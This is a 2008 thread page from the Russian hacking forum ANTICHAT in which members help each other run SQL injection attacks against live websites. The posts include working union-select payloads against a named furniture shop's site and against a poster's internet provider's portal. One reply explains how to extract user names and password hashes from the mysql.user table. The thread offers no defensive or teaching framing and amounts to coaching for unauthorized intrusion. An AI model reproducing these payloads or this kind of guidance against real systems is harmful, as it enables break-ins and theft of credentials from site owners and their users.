ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #941  
Старый 13.02.2008, 21:05
Lesnoy_chelovek
Постоянный
Регистрация: 06.12.2006
Сообщений: 321
С нами: 10226273

Репутация: 370
По умолчанию

kair
http://search.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=OpenSSH+3.9 p1&x=0&y=0
http://search.securityfocus.com/swsearch?query=SSH+1.99&sbm=%2F&submit=Search%21&m etaname=alldoc&sort=swishrank

Ох не знал я, что поисковики отменили.
 
Ответить с цитированием

  #942  
Старый 13.02.2008, 21:06
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
С нами: 10639074

Репутация: 16
По умолчанию

Цитата:
Сообщение от Constantine  
m0use кури more than 1 row от Elekt'а , там реально все сделать.
Ветка там 4, таблица users, колонки: id,username,password
А поподробней можно? что за more than 1 row от Elekt'а?
 
Ответить с цитированием

  #943  
Старый 13.02.2008, 21:08
l-l00K
Leaders of Antichat - Level 4
Регистрация: 26.11.2006
Сообщений: 237
С нами: 10240166

Репутация: 2097
По умолчанию

http://forum.antichat.ru/threadnav35207-1-10.html
__________________
Не занимаюсь коммерцией в любых ее проявлениях.
 
Ответить с цитированием

  #944  
Старый 13.02.2008, 21:49
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Цитата:
Сообщение от Spyder  
а хз чё тебе надо

написали смотреть в исходник- смотрю :Р.там лоад фаил пахал,я и просмотрел исходник.
 
Ответить с цитированием

  #945  
Старый 13.02.2008, 22:58
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,table_name,2,3,4,5,6,7,8,9,10,11 +from+information_schema.tables/*

что не подставляю, возвращает ошибку с mysql_num_rows(),версию базу и т.д узнать почемуто можно)(
 
Ответить с цитированием

  #946  
Старый 13.02.2008, 23:02
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами: 10243046

Репутация: 3033


По умолчанию

Велемир я тебе сказал искать конфиги или исходники авторизации админки. Путь у тебя есть, собрать до нужного файла легко

http://www.mebel24.ru/shopinfo.php?id=-22+union+select+0,version(),2,3,4,5,6,7,8,9,10,11/*

откдуа ты там схему запрашиваешь, ветка старая, информатион_схема только с 5ой ветке
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #947  
Старый 13.02.2008, 23:03
Macro
Постоянный
Регистрация: 11.11.2006
Сообщений: 595
С нами: 10261766

Репутация: 1079


По умолчанию

Версия mysql 4.1.22, там нету базы information_schema
 
Ответить с цитированием

  #948  
Старый 13.02.2008, 23:13
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
С нами: 10470131

Репутация: 142


По умолчанию

Сорь...не знал,*пошёл дальше рыскать*
 
Ответить с цитированием

  #949  
Старый 15.02.2008, 14:26
CaNNabi$
Познающий
Регистрация: 21.01.2008
Сообщений: 85
С нами: 9633635

Репутация: 338
По умолчанию

Ну чтож почти научился SQL инекций) вот токо у меня не получается вывеси логин с хэшем вот например это портал нашего провайдреа

Код:
http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,concat_ws(0x2F,version(),database(),user()),6,7,8/*
Ну это покажет версию, базу и имя, вот я подставлял потом такое значение

Код:
http://*********/portal.php?module=news&view_gid=0x3127%20union+select+1,2,3,4,user,password,6,7,8+from+mysql.user/*
Токо не пошло, можете обяснить что подставить надо? Статьи прочитал подставлял не полуличось, либо я не понял)
 
Ответить с цитированием

  #950  
Старый 15.02.2008, 14:31
aka PSIH
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
С нами: 10660753

Репутация: 676


По умолчанию

CaNNabi$
union select 1,2,3,4,user,6,7,8 from mysql.user/*
либо так
union select 1,2,3,4,concat_ws(0x3a,user,password),6,7,8 from mysql.user/*
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.